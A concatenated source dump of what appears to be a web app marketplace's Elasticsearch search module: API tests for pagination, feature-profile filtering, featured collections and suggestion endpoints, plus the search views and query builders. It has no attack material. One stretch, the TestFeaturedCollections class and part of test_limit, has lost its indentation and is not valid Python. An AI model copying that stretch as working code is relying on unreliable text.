        res = self.client.get(self.url, data={'limit': '2', 'sort': 'created'})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        eq_(int(data['objects'][0]['id']), app1.id)
        eq_(int(data['objects'][1]['id']), app2.id)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['limit'], 2)
        eq_(data['meta']['previous'], None)
        eq_(data['meta']['offset'], 0)
        # 'next_url' rather than 'next' to avoid shadowing the builtin.
        next_url = urlparse(data['meta']['next'])
        eq_(next_url.path, self.url)
        eq_(QueryDict(next_url.query).dict(), {'limit': '2', 'offset': '2',
                                               'sort': 'created'})

        res = self.client.get(self.url, QueryDict(next_url.query).dict())
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        eq_(int(data['objects'][0]['id']), app3.id)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['limit'], 2)
        prev_url = urlparse(data['meta']['previous'])
        # Bug fix: this used to re-check the 'next' link's path instead of
        # the 'previous' link's.
        eq_(prev_url.path, self.url)
        eq_(QueryDict(prev_url.query).dict(), {'limit': '2', 'offset': '0',
                                               'sort': 'created'})
        eq_(data['meta']['offset'], 2)
        eq_(data['meta']['next'], None)

    def test_content_ratings_reindex(self):
        self.webapp.set_content_ratings({
            mkt.ratingsbodies.GENERIC: mkt.ratingsbodies.GENERIC_18
        })
        self.refresh('webapp')
        res = self.client.get(self.url)
        obj = res.json['objects'][0]
        ok_(obj['content_ratings']['rating'])

    def test_usk_refused_exclude(self):
        geodata = self.webapp._geodata
        geodata.update(region_de_usk_exclude=True)
        self.reindex(Webapp, 'webapp')

        res = self.client.get(self.url, {'region': 'de'})
        ok_(not res.json['objects'])

    def test_icon_url_never(self):
        self.webapp.update(icon_hash=None)
        self.refresh('webapp')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['icons']['64'], self.webapp.get_icon_url(64))
        ok_(obj['icons']['64'].endswith('?modified=never'))

    def test_tag(self):
        tag1 = Tag.objects.create(tag_text='tagtagtag')
        tag2 = Tag.objects.create(tag_text='tarako')
        Tag.objects.create(tag_text='dummy')
        AddonTag.objects.create(addon=self.webapp, tag=tag1)
        AddonTag.objects.create(addon=self.webapp, tag=tag2)
        self.reindex(Webapp, 'webapp')

        res = self.client.get(self.url, {'tag': 'tarako'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        self.assertSetEqual(obj['tags'], ['tagtagtag', 'tarako'])

    def test_ratings_sort(self):
        app1 = self.webapp
        app2 = app_factory()
        user = user_factory()
        app1._reviews.create(user=user, rating=1)
        app2._reviews.create(user=user, rating=5)
        self.refresh()
        res = self.client.get(self.url, {'sort': 'rating'})
        eq_(res.status_code, 200)
        eq_(res.json['objects'][0]['id'], app2.id)
        eq_(res.json['objects'][1]['id'], app1.id)
class TestApiFeatures(RestOAuth, ESTestCase):
    """Search filtering by device feature profile ('pro' signature)."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.client = RestOAuthClient(None)
        self.url = reverse('search-api')
        self.webapp = Webapp.objects.get(pk=337141)
        # Pick a few common device features.
        self.profile = FeatureProfile(apps=True, audio=True, fullscreen=True,
                                      geolocation=True, indexeddb=True,
                                      sms=True).to_signature()
        self.qs = {'q': 'something', 'pro': self.profile, 'dev': 'firefoxos'}

    def test_no_features(self):
        # Base test to make sure we find the app.
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data=self.qs)
        eq_(res.status_code, 200)
        obj = json.loads(res.content)['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_one_good_feature(self):
        # Enable an app feature that matches one in our profile.
        self.webapp.current_version.features.update(has_geolocation=True)
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data=self.qs)
        eq_(res.status_code, 200)
        obj = json.loads(res.content)['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_one_bad_feature(self):
        # Enable an app feature that doesn't match one in our profile.
        self.webapp.current_version.features.update(has_pay=True)
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data=self.qs)
        eq_(res.status_code, 200)
        objs = json.loads(res.content)['objects']
        eq_(len(objs), 0)

    def test_all_good_features(self):
        # Enable app features so they exactly match our device profile.
        fp = FeatureProfile.from_signature(self.profile)
        self.webapp.current_version.features.update(
            **dict(('has_%s' % k, v) for k, v in fp.items()))
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data=self.qs)
        eq_(res.status_code, 200)
        obj = json.loads(res.content)['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_bad_profile_on_desktop(self):
        # Enable an app feature that doesn't match one in our profile.
        qs = self.qs.copy()
        del qs['dev']  # Desktop doesn't send a device.
        self.webapp.current_version.features.update(has_pay=True)
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data=qs)
        eq_(res.status_code, 200)
        obj = json.loads(res.content)['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
class BaseFeaturedTests(RestOAuth, ESTestCase):
    """Shared fixture/query-string setup for featured-search API tests."""
    fixtures = fixture('user_2519', 'webapp_337141')
    list_url = reverse('featured-search-api')

    def setUp(self):
        super(BaseFeaturedTests, self).setUp()
        self.cat = Category.objects.create(type=amo.ADDON_WEBAPP, slug='books')
        self.app = Webapp.objects.get(pk=337141)
        AddonDeviceType.objects.create(
            addon=self.app, device_type=DEVICE_CHOICES_IDS['firefoxos'])
        AddonCategory.objects.get_or_create(addon=self.app, category=self.cat)
        # A feature-profile signature matching a few common device features.
        self.profile = FeatureProfile(apps=True, audio=True, fullscreen=True,
                                      geolocation=True, indexeddb=True,
                                      sms=True).to_signature()
        self.qs = {'cat': 'books', 'pro': self.profile, 'dev': 'firefoxos'}
class TestFeaturedCollections(BaseFeaturedTests):
"""
Tests to ensure that CollectionFilterSetWithFallback is being called and
its results are being added to the response.
"""
col_type = COLLECTIONS_TYPE_BASIC
prop_name = 'collections'
def setUp(self):
super(TestFeaturedCollections, self).setUp()
self.col = Collection.objects.create(
name='Hi', description='Mom', collection_type=self.col_type,
category=self.cat, is_public=True, region=mkt.regions.US.id)
self.qs['region'] = mkt.regions.US.slug
# FIXME: mock the search part, we don't care about it.
def make_request(self):
res = self.client.get(self.list_url, self.qs)
eq_(res.status_code, 200)
return res, res.json
def test_added_to_results(self):
res, json = self.make_request()
ok_(self.prop_name in res.json)
eq_(len(json[self.prop_name]), 1)
eq_(json[self.prop_name][0]['id'], self.col.id)
return res, json
def test_apps_included(self):
self.col.add_app(self.app)
self.refresh('webapp')
res, json = self.test_added_to_results()
apps = json[self.prop_name][0]['apps']
eq_(len(apps), 1)
# Make sure we are using the simplified representation for apps.
eq_(apps[0]['name'], {u'en-US': u'Something Something Steamcube!',
u'es': u'Algo Algo Steamcube!'})
ok_(not 'app_type' in apps[0])
return res, json
def test_features_filtered(self):
"""
Test that the app list is passed through feature profile filtering.
"""
self.app.current_version.features.update(has_pay=True)
self.col.add_app(self.app)
self.refresh('webapp')
res, json = self.test_added_to_results()
eq_(len(json[self.prop_name][0]['apps']), 0)
def test_device_filtered(self):
"""
Test that the app list properly filters by supported device.
"""
AddonDeviceType.objects.filter(addon=self.app).update(
device_type=DEVICE_CHOICES_IDS['desktop'])
self.col.add_app(self.app)
self.refresh('webapp')
res, json = self.test_added_to_results()
eq_(len(json[self.prop_name][0]['apps']), 0)
def test_only_public(self):
self.col2 = Collection.objects.create(
name='Col', description='Hidden', collection_type=self.col_type,
category=self.cat, is_public=False)
res, json = self.test_added_to_results()
header = 'API-Fallback-%s' % self.prop_name
ok_(not header in res)
def test_only_this_type(self):
"""
Add a second collection of a different collection type, then ensure
that it does not change the results of this collection type's property.
"""
different_type = (COLLECTIONS_TYPE_FEATURED if self.col_type ==
COLLECTIONS_TYPE_BASIC else COLLECTIONS_TYPE_BASIC)
self.col2 = Collection.objects.create(
name='Bye', description='Dad', collection_type=different_type,
category=self.cat, is_public=True)
res, json = self.test_added_to_results()
header = 'API-Fallback-%s' % self.prop_name
ok_(not header in res)
@patch('mkt.collections.serializers.CollectionMembershipField.to_native')
def test_limit(self, mock_field_to_native):
"""
Add a second collection, then ensure than the old one is not present
in the results since we are limiting at 1 collection of each type
"""
mock_field_to_native.return_value = None
self.col.add_app(self.app)
self.col = Collection.objects.create(
name='Me', description='Hello', collection_type=self.col_type,
category=self.cat, is_public=True, region=mkt.regions.US.id)
# Call standard test method. We don't care about apps here, no need to
# add some or refresh ES.
self.test_added_to_results()
# Make sure to_native() was called only once, with ES data, with the
# use_es argument.
eq_(mock_field_to_native.call_count, 1)
ok_(isinstance(mock_field_to_native.call_args[0][0], S))
eq_(mock_field_to_native.call_args[1].get('use_es', False), True)
@patch('mkt.collections.serializers.CollectionMembershipField.to_native')
def test_limit_preview(self, mock_field_to_native):
    """
    Like test_limit, except we are in preview mode, so we shouldn't be
    using ES for apps.
    """
    mock_field_to_native.return_value = None
    self.col.add_app(self.app)
    self.col = Collection.objects.create(
        name='Me', description='Hello', collection_type=self.col_type,
        category=self.cat, is_public=True, region=mkt.regions.US.id)
    # Modify the query string to include preview parameter.
    self.qs['preview'] = True
    # Call standard test method. We don't care about apps themselves here.
    self.test_added_to_results()
    # Make sure to_native() was called only once, with DB data, without the
    # use_es argument (since we are in preview mode).
    eq_(mock_field_to_native.call_count, 1)
    ok_(isinstance(mock_field_to_native.call_args[0][0], QuerySet))
    eq_(mock_field_to_native.call_args[1].get('use_es', False), False)
@patch('mkt.search.views.SearchView.get_region_from_request')
@patch('mkt.search.views.CollectionFilterSetWithFallback')
def test_collection_filterset_called(self, mock_fallback, mock_region):
    """
    CollectionFilterSetWithFallback should be called 3 times, one for each
    collection_type.
    """
    # Mock get_region_from_request() and ensure we are not passing it as
    # the query string parameter.
    self.qs.pop('region', None)
    mock_region.return_value = mkt.regions.SPAIN
    res, json = self.make_request()
    eq_(mock_fallback.call_count, 3)
    # We expect all calls to contain self.qs and region parameter.
    expected_args = {'region': mkt.regions.SPAIN.slug}
    expected_args.update(self.qs)
    # Every invocation receives the same filter dict as first positional arg.
    for call in mock_fallback.call_args_list:
        eq_(call[0][0], expected_args)
def test_fallback_usage(self):
    """
    Test that the fallback mechanism is used for the collection_type we are
    testing.
    """
    # Request the list using region. self.col should get picked up
    # because the fallback mechanism will try with region set to None.
    self.col.update(region=None, carrier=None)
    self.qs['region'] = mkt.regions.SPAIN.slug
    self.qs['carrier'] = mkt.carriers.UNKNOWN_CARRIER.slug
    res, json = self.test_added_to_results()
    # The response advertises which filters were relaxed, in order.
    header = 'API-Fallback-%s' % self.prop_name
    ok_(header in res)
    eq_(res[header], 'region,carrier')
@patch('mkt.search.views.FeaturedSearchView.get_region_from_request')
def test_region_None(self, get_region_from_request):
    """Collections are still returned when no region can be detected."""
    get_region_from_request.return_value = None
    self.test_added_to_results()
def test_tarako_category(self):
    """
    Test that when passing a tarako category, collections are not included.
    """
    self.qs['cat'] = 'tarako-lifestyle'
    res, json = self.make_request()
    # The collections property should be entirely absent, not just empty.
    ok_(not self.prop_name in res.json)
class TestFeaturedOperator(TestFeaturedCollections):
    """Re-run the featured-collections test suite for operator shelves."""
    col_type = COLLECTIONS_TYPE_OPERATOR
    prop_name = 'operator'
class TestFeaturedApps(TestFeaturedCollections):
    """Re-run the featured-collections test suite for featured apps."""
    col_type = COLLECTIONS_TYPE_FEATURED
    prop_name = 'featured'
@patch.object(settings, 'SITE_URL', 'http://testserver')
class TestSuggestionsApi(ESTestCase):
    """Tests for the OpenSearch-style suggestions endpoint."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.url = reverse('suggestions-search-api')
        self.refresh('webapp')
        self.client = RestOAuthClient(None)
        self.app1 = Webapp.objects.get(pk=337141)
        # Re-save to make sure app1 gets (re)indexed.
        self.app1.save()
        self.app2 = app_factory(name=u'Second âpp',
                                description=u'Second dèsc' * 25,
                                icon_type='image/png',
                                created=self.days_ago(3))
        self.refresh('webapp')

    def tearDown(self):
        # Cleanup to remove these from the index.
        self.app1.delete()
        self.app2.delete()
        unindex_webapps([self.app1.id, self.app2.id])

    def test_suggestions(self):
        # Response follows the x-suggestions format:
        # [query, names, descriptions, urls, icons].
        response = self.client.get(self.url, data={'lang': 'en-US'})
        parsed = json.loads(response.content)
        eq_(parsed[0], '')
        self.assertSetEqual(
            parsed[1],
            [unicode(self.app1.name), unicode(self.app2.name)])
        # app2's long description is truncated by the serializer.
        self.assertSetEqual(
            parsed[2],
            [unicode(self.app1.description),
             unicode(truncate(self.app2.description))])
        self.assertSetEqual(
            parsed[3],
            [absolutify(self.app1.get_detail_url()),
             absolutify(self.app2.get_detail_url())])
        self.assertSetEqual(
            parsed[4],
            [self.app1.get_icon_url(64), self.app2.get_icon_url(64)])

    def test_suggestions_filtered(self):
        # A 'q' parameter narrows suggestions to matching apps only.
        response = self.client.get(self.url, data={'q': 'Second',
                                                   'lang': 'en-US'})
        parsed = json.loads(response.content)
        eq_(parsed[1], [unicode(self.app2.name)])
class TestRocketbarApi(ESTestCase):
    """Tests for the Rocketbar completion-suggest search endpoint."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        self.url = reverse('rocketbar-search-api')
        self.refresh('webapp')
        self.client = RestOAuthClient(None)
        self.profile = UserProfile.objects.get(pk=2519)
        self.app1 = Webapp.objects.get(pk=337141)
        # Both apps are flagged as Gaia apps; the endpoint only suggests
        # Gaia apps (see test_suggestion_non_gaia_apps).
        self.app1.addondevicetype_set.create(device_type=amo.DEVICE_GAIA.id)
        self.app1.save()
        self.app2 = app_factory(name=u'Something Second Something Something',
                                description=u'Second dèsc' * 25,
                                icon_type='image/png',
                                icon_hash='fakehash',
                                created=self.days_ago(3),
                                manifest_url='http://rocket.example.com')
        self.app2.addondevicetype_set.create(device_type=amo.DEVICE_GAIA.id)
        # Add 2 installed records so this app is boosted higher than app1.
        Installed.objects.create(user=self.profile, addon=self.app2)
        Installed.objects.create(user=amo.tests.user_factory(),
                                 addon=self.app2)
        self.app2.save()
        self.refresh('webapp')

    def tearDown(self):
        # Cleanup to remove these from the index.
        self.app1.delete()
        self.app2.delete()
        unindex_webapps([self.app1.id, self.app2.id])
        # Required to purge the suggestions data structure. In Lucene, a
        # document is not deleted from a segment, just marked as deleted.
        WebappIndexer.get_es().optimize(WebappIndexer.get_index(),
                                        only_expunge_deletes=True)

    def test_no_results(self):
        # assertNumQueries(0): suggestions must be served purely from ES.
        with self.assertNumQueries(0):
            response = self.client.get(self.url, data={'q': 'whatever',
                                                       'lang': 'en-US'})
        parsed = json.loads(response.content)
        eq_(parsed, [])

    def test_suggestions(self):
        with self.assertNumQueries(0):
            response = self.client.get(self.url, data={'q': 'Something Second',
                                                       'lang': 'en-US'})
        parsed = json.loads(response.content)
        eq_(len(parsed), 1)
        eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
                        'icon': self.app2.get_icon_url(64),
                        'name': unicode(self.app2.name),
                        'slug': self.app2.app_slug})
        # Icon URL carries the icon_hash cache-buster.
        ok_(self.app2.get_icon_url(64).endswith('?modified=fakehash'))

    def test_suggestion_default_locale(self):
        # Move app2's name to 'es' and make that its default locale: the
        # suggestion should still come back for an en-US request.
        self.app2.name.locale = 'es'
        self.app2.name.save()
        self.app2.default_locale = 'es'
        self.app2.save()
        self.refresh()
        with self.assertNumQueries(0):
            response = self.client.get(self.url, data={'q': 'Something Second',
                                                       'lang': 'en-US'})
        parsed = json.loads(response.content)
        eq_(len(parsed), 1)
        eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
                        'icon': self.app2.get_icon_url(64),
                        'name': unicode(self.app2.name),
                        'slug': self.app2.app_slug})

    def test_suggestions_multiple_results(self):
        with self.assertNumQueries(0):
            response = self.client.get(self.url, data={'q': 'Something',
                                                       'lang': 'en-US'})
        parsed = json.loads(response.content)
        eq_(len(parsed), 2)
        # Show app2 first since it gets boosted higher b/c of installs.
        eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
                        'icon': self.app2.get_icon_url(64),
                        'name': unicode(self.app2.name),
                        'slug': self.app2.app_slug})
        eq_(parsed[1], {'manifest_url': self.app1.get_manifest_url(),
                        'icon': self.app1.get_icon_url(64),
                        'name': unicode(self.app1.name),
                        'slug': self.app1.app_slug})

    def test_suggestion_non_gaia_apps(self):
        # Without the Gaia device type, apps must not be suggested at all.
        AddonDeviceType.objects.all().delete()
        self.app1.save()
        self.app2.save()
        self.refresh('webapp')
        with self.assertNumQueries(0):
            response = self.client.get(self.url, data={'q': 'something'})
        parsed = json.loads(response.content)
        eq_(parsed, [])

    def test_suggestions_limit(self):
        # The `limit` parameter caps the number of suggestions returned.
        with self.assertNumQueries(0):
            response = self.client.get(self.url, data={'q': 'something',
                                                       'lang': 'en-US',
                                                       'limit': 1})
        parsed = json.loads(response.content)
        eq_(len(parsed), 1)
        eq_(parsed[0], {'manifest_url': self.app2.get_manifest_url(),
                        'icon': self.app2.get_icon_url(64),
                        'name': unicode(self.app2.name),
                        'slug': self.app2.app_slug})
class TestSimpleESAppSerializer(amo.tests.ESTestCase):
    """Sanity checks for SimpleESAppSerializer fed with raw ES objects."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)
        self.request = RequestFactory().get('/')
        # Run the region middleware so the serializer sees a request.REGION.
        RegionMiddleware().process_request(self.request)
        self.reindex(Webapp, 'webapp')
        self.indexer = S(WebappIndexer).filter(id=337141).execute().objects[0]
        self.serializer = SimpleESAppSerializer(self.indexer,
            context={'request': self.request})

    def test_regions_present(self):
        # Regression test for bug 964802.
        ok_('regions' in self.serializer.data)
        eq_(len(self.serializer.data['regions']),
            len(self.webapp.get_regions()))
########NEW FILE########
__FILENAME__ = utils
from elasticutils.contrib.django import S as eu_S
from statsd import statsd
class S(eu_S):
    """elasticutils S subclass that reports raw query timings to statsd."""

    def raw(self):
        # Time the full round-trip to elasticsearch, and also record the
        # server-side 'took' value reported in the response payload.
        with statsd.timer('search.raw'):
            response = super(S, self).raw()
            statsd.timing('search.took', response['took'])
        return response
########NEW FILE########
__FILENAME__ = views
from __future__ import absolute_import
import json
from django.conf import settings
from django.http import HttpResponse
from django.utils import translation
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.generics import GenericAPIView
import amo
from translations.helpers import truncate
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, form_errors, MarketplaceView
from mkt.api.paginator import ESPaginator
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_FEATURED,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.filters import CollectionFilterSetWithFallback
from mkt.collections.models import Collection
from mkt.collections.serializers import CollectionSerializer
from mkt.features.utils import get_feature_profile
from mkt.search.forms import (ApiSearchForm, DEVICE_CHOICES_IDS,
TARAKO_CATEGORIES_MAPPING)
from mkt.search.serializers import (ESAppSerializer, RocketbarESAppSerializer,
SuggestionsESAppSerializer)
from mkt.search.utils import S
from mkt.webapps.models import Webapp, WebappIndexer
# Query-string filter names that _filter_search() applies when the caller
# does not pass an explicit `filters` list.
DEFAULT_FILTERS = ['cat', 'device', 'premium_types', 'price', 'sort', 'tag']

# Maps public `sort` values to the elasticsearch fields they order by.
DEFAULT_SORTING = {
    'popularity': '-popularity',
    # TODO: Should popularity replace downloads?
    'downloads': '-weekly_downloads',
    'rating': '-bayesian_rating',
    'created': '-created',
    'reviewed': '-reviewed',
    'name': 'name_sort',
}
def _get_locale_analyzer():
    """
    Return the ES analyzer name for the active locale, or None when the
    analyzer requires an ES plugin that is disabled via settings.
    """
    analyzer = amo.SEARCH_LANGUAGE_TO_ANALYZER.get(translation.get_language())
    if analyzer in amo.SEARCH_ANALYZER_PLUGINS and not settings.ES_USE_PLUGINS:
        return None
    return analyzer
def get_custom_analyzer(language):
    """
    Returns name of analyzer based on language name.
    """
    # Languages with a dedicated stemmer get a custom '<lang>_analyzer';
    # every other language uses an analyzer named after itself.
    return ('%s_analyzer' % language if language in amo.STEMMER_MAP
            else language)
def name_only_query(q):
    """
    Returns a dictionary with field/value mappings to pass to elasticsearch.

    This sets up various queries with boosting against the name field in the
    elasticsearch index.
    """
    d = {}

    rules = {
        'match': {'query': q, 'boost': 3, 'analyzer': 'standard'},
        # Bug fix: this entry used to reuse the 'match' key, so it silently
        # overwrote the standard-analyzer match above and only the phrase
        # variant was ever sent. Use the distinct match_phrase action so
        # both queries are issued.
        'match_phrase': {'query': q, 'boost': 4, 'slop': 1},
        'startswith': {'value': q, 'boost': 1.5}
    }
    # Only add fuzzy queries if q is a single word. It doesn't make sense to do
    # a fuzzy query for multi-word queries.
    if ' ' not in q:
        rules['fuzzy'] = {'value': q, 'boost': 2, 'prefix_length': 1}

    for k, v in rules.iteritems():
        for field in ('name', 'app_slug', 'author'):
            d['%s__%s' % (field, k)] = v

    # Exact matches need to be queried against a non-analyzed field. Let's do a
    # term query on `name_sort` for an exact match against the app name and
    # give it a good boost since this is likely what the user wants.
    d['name_sort__term'] = {'value': q, 'boost': 10}

    analyzer = _get_locale_analyzer()
    if analyzer:
        d['name_%s__match' % analyzer] = {
            'query': q, 'boost': 2.5,
            'analyzer': get_custom_analyzer(analyzer)}
    return d
def name_query(q):
    """
    Returns a dictionary with field/value mappings to pass to elasticsearch.

    Note: This is marketplace specific. See apps/search/views.py for AMO.
    """
    # Start with the description-based rules, then layer the name-based
    # rules on top (name rules win on any key collision, as before).
    extra = {
        'description__match': {'query': q, 'boost': 0.8, 'type': 'phrase'},
    }

    analyzer = _get_locale_analyzer()
    if analyzer:
        extra['description_%s__match' % analyzer] = {
            'query': q, 'boost': 0.6, 'type': 'phrase',
            'analyzer': get_custom_analyzer(analyzer)}

    extra['tags__match'] = {'query': q}
    if ' ' not in q:
        extra['tags__fuzzy'] = {'value': q, 'prefix_length': 1}

    extra.update(name_only_query(q))
    return extra
def _filter_search(request, qs, query, filters=None, sorting=None,
                   sorting_default='-popularity', region=None, profile=None):
    """
    Filter an ES queryset based on a list of filters.

    Arguments:
    request -- the current request.
    qs -- the elasticutils S object to filter.
    query -- cleaned form data (dict) driving the filtering.

    Keyword arguments:
    filters -- filter names to consider; DEFAULT_FILTERS when None.
    sorting -- mapping of sort names to ES fields; DEFAULT_SORTING when None.
    sorting_default -- ordering applied when no query and no sort are given.
    region -- region object, used for region-specific popularity sorting.
    profile -- a FeatureProfile object; when provided we filter by the
        profile. If you don't want to filter by these don't pass it. I.e. do
        the device detection for when this happens elsewhere.
    """
    # Intersection of the form fields present and the filters we want to apply.
    filters = filters or DEFAULT_FILTERS
    sorting = sorting or DEFAULT_SORTING
    show = filter(query.get, filters)

    if query.get('q'):
        qs = qs.query(should=True, **name_query(query['q'].lower()))
    if 'cat' in show:
        # query['cat'] should be a list, the form clean_cat method takes care
        # of that.
        qs = qs.filter(category__in=query['cat'])
    if 'tag' in show:
        # We only allow searching on one tag for now, and not a list.
        qs = qs.filter(tags=query['tag'])
    if 'price' in show:
        if query['price'] == 'paid':
            qs = qs.filter(premium_type__in=amo.ADDON_PREMIUMS)
        elif query['price'] == 'free':
            qs = qs.filter(premium_type__in=amo.ADDON_FREES, price=0)
    if 'device' in show:
        qs = qs.filter(device=DEVICE_CHOICES_IDS[query['device']])
    if 'premium_types' in show:
        if query.get('premium_types'):
            qs = qs.filter(premium_type__in=query['premium_types'])
    if query.get('app_type'):
        # Also include `privileged` apps even when we search for `packaged`.
        # Bug fix: this used to call the non-existent list.push(), raising
        # AttributeError whenever 'packaged' was requested. Work on a copy
        # so we don't mutate the caller's cleaned_data either.
        app_types = list(query['app_type'])
        if 'packaged' in app_types and 'privileged' not in app_types:
            app_types.append('privileged')
        qs = qs.filter(app_type__in=app_types)
    if query.get('manifest_url'):
        qs = qs.filter(manifest_url=query['manifest_url'])
    if query.get('offline') is not None:
        qs = qs.filter(is_offline=query.get('offline'))
    if query.get('languages'):
        langs = [x.strip() for x in query['languages'].split(',')]
        qs = qs.filter(supported_locales__in=langs)
    if 'sort' in show:
        sort_by = [sorting[name] for name in query['sort'] if name in sorting]

        # For "Adolescent" regions popularity is global installs + reviews.
        # Bug fix: query['sort'] is a list (it is iterated just above), so
        # comparing it to the string 'popularity' was always False; test
        # membership instead.
        if 'popularity' in query['sort'] and region and not region.adolescent:
            # For "Mature" regions popularity becomes installs + reviews
            # from only that region.
            sort_by = ['-popularity_%s' % region.id]

        if sort_by:
            qs = qs.order_by(*sort_by)
    elif not query.get('q'):
        # NOTE(review): this only matches when a caller passes 'popularity'
        # without the leading '-'; the default '-popularity' never matches.
        # Confirm that is intended.
        if (sorting_default == 'popularity' and region and
            not region.adolescent):
            # For "Mature" regions popularity becomes installs + reviews
            # from only that region.
            sorting_default = '-popularity_%s' % region.id

        # Sort by a default if there was no query so results are predictable.
        qs = qs.order_by(sorting_default)

    if profile:
        # Exclude apps that require any features we don't support.
        qs = qs.filter(**profile.to_kwargs(prefix='features.has_'))

    return qs
class SearchView(CORSMixin, MarketplaceView, GenericAPIView):
    """Public app search API, backed by elasticsearch."""
    cors_allowed_methods = ['get']
    authentication_classes = [RestSharedSecretAuthentication,
                              RestOAuthAuthentication]
    permission_classes = [AllowAny]
    serializer_class = ESAppSerializer
    form_class = ApiSearchForm
    paginator_class = ESPaginator

    def search(self, request):
        """Run the search; return (pagination serializer, query string)."""
        data = self.get_search_data(request)
        region = self.get_region_from_request(request)
        queryset = self.get_query(request,
                                  base_filters={'type': data['type']},
                                  region=region)
        queryset = self.apply_filters(request, queryset, data=data,
                                      profile=get_feature_profile(request))
        page = self.paginate_queryset(queryset.values_dict())
        return self.get_pagination_serializer(page), data.get('q', '')

    def get(self, request, *args, **kwargs):
        serializer, _unused_query = self.search(request)
        return Response(serializer.data)

    def get_search_data(self, request):
        """Validate the query string through the search form."""
        form = self.form_class(request.GET if request else None)
        if form.is_valid():
            return form.cleaned_data
        raise form_errors(form)

    def get_query(self, request, base_filters=None, region=None):
        """Build the base ES queryset, honoring the request's device flags."""
        return Webapp.from_search(request, region=region, gaia=request.GAIA,
                                  tablet=request.TABLET,
                                  mobile=request.MOBILE,
                                  filter_overrides=base_filters)

    def apply_filters(self, request, qs, data=None, profile=None):
        """Apply the standard, region-aware search filters to `qs`."""
        return _filter_search(request, qs, data,
                              region=self.get_region_from_request(request),
                              profile=profile)
class FeaturedSearchView(SearchView):
    """Search endpoint that also bundles curated collections in the reply."""
    collections_serializer_class = CollectionSerializer

    def collections(self, request, collection_type=None, limit=1):
        """
        Serialize up to `limit` public collections matching the request's
        filters. Returns (serialized data, fallback info or None).
        """
        params = request.GET.dict()
        region = self.get_region_from_request(request)
        if region:
            params.setdefault('region', region.slug)
        if collection_type is None:
            base_qs = Collection.public.all()
        else:
            base_qs = Collection.public.filter(
                collection_type=collection_type)
        qs = CollectionFilterSetWithFallback(params, queryset=base_qs).qs
        serializer = self.collections_serializer_class(
            qs[:limit], many=True, context={
                'request': request,
                'view': self,
                # In preview mode apps come from the DB rather than ES.
                'use-es-for-apps': not params.get('preview', False)}
        )
        return serializer.data, getattr(qs, 'filter_fallback', None)

    def get(self, request, *args, **kwargs):
        serializer, _unused_query = self.search(request)
        payload, fallbacks = self.add_featured_etc(request, serializer.data)
        response = Response(payload)
        # Advertise which filters were relaxed for each collection type.
        for kind, relaxed in fallbacks.items():
            response['API-Fallback-%s' % kind] = ','.join(relaxed)
        return response

    def add_featured_etc(self, request, data):
        """Attach 'collections'/'featured'/'operator' keys to `data`."""
        # Tarako categories don't have collections.
        if request.GET.get('cat') in TARAKO_CATEGORIES_MAPPING:
            return data, {}
        fallbacks = {}
        for key, col_type in (('collections', COLLECTIONS_TYPE_BASIC),
                              ('featured', COLLECTIONS_TYPE_FEATURED),
                              ('operator', COLLECTIONS_TYPE_OPERATOR)):
            data[key], fallback = self.collections(
                request, collection_type=col_type)
            if fallback:
                fallbacks[key] = fallback
        return data, fallbacks
class SuggestionsView(SearchView):
    """Anonymous OpenSearch-style suggestions (x-suggestions format)."""
    cors_allowed_methods = ['get']
    authentication_classes = []
    permission_classes = [AllowAny]
    serializer_class = SuggestionsESAppSerializer

    def get(self, request, *args, **kwargs):
        results, query = self.search(request)
        apps = results.data['objects']
        names = [app['name'] for app in apps]
        descs = [truncate(app['description']) for app in apps]
        urls = [app['absolute_url'] for app in apps]
        icons = [app['icon'] for app in apps]
        # This returns a bare JSON list. Usually this is a bad idea, but we
        # don't return any user-specific data, it's fully anonymous, so
        # we're fine.
        return HttpResponse(json.dumps([query, names, descs, urls, icons]),
                            content_type='application/x-suggestions+json')
class RocketbarView(SearchView):
    """Anonymous completion-suggest endpoint for the Firefox OS Rocketbar."""
    cors_allowed_methods = ['get']
    authentication_classes = []
    permission_classes = [AllowAny]
    serializer_class = RocketbarESAppSerializer

    def get(self, request, *args, **kwargs):
        # Query the ES _suggest endpoint directly with a completion
        # suggester over the indexed app names.
        suggest_query = {
            'apps': {
                'completion': {'field': 'name_suggest',
                               'size': request.GET.get('limit', 5)},
                'text': request.GET.get('q', '').strip(),
            }
        }
        results = S(WebappIndexer).get_es().send_request(
            'GET', [WebappIndexer.get_index(), '_suggest'],
            body=suggest_query)
        data = results['apps'][0]['options'] if 'apps' in results else []
        serializer = self.get_serializer(data)
        # This returns a JSON list. Usually this is a bad idea for security
        # reasons, but we don't include any user-specific data, it's fully
        # anonymous, so we're fine.
        return HttpResponse(json.dumps(serializer.data),
                            content_type='application/x-rocketbar+json')
########NEW FILE########
__FILENAME__ = settings
import datetime
import os
from lib.settings_base import *
from mkt import asset_bundles
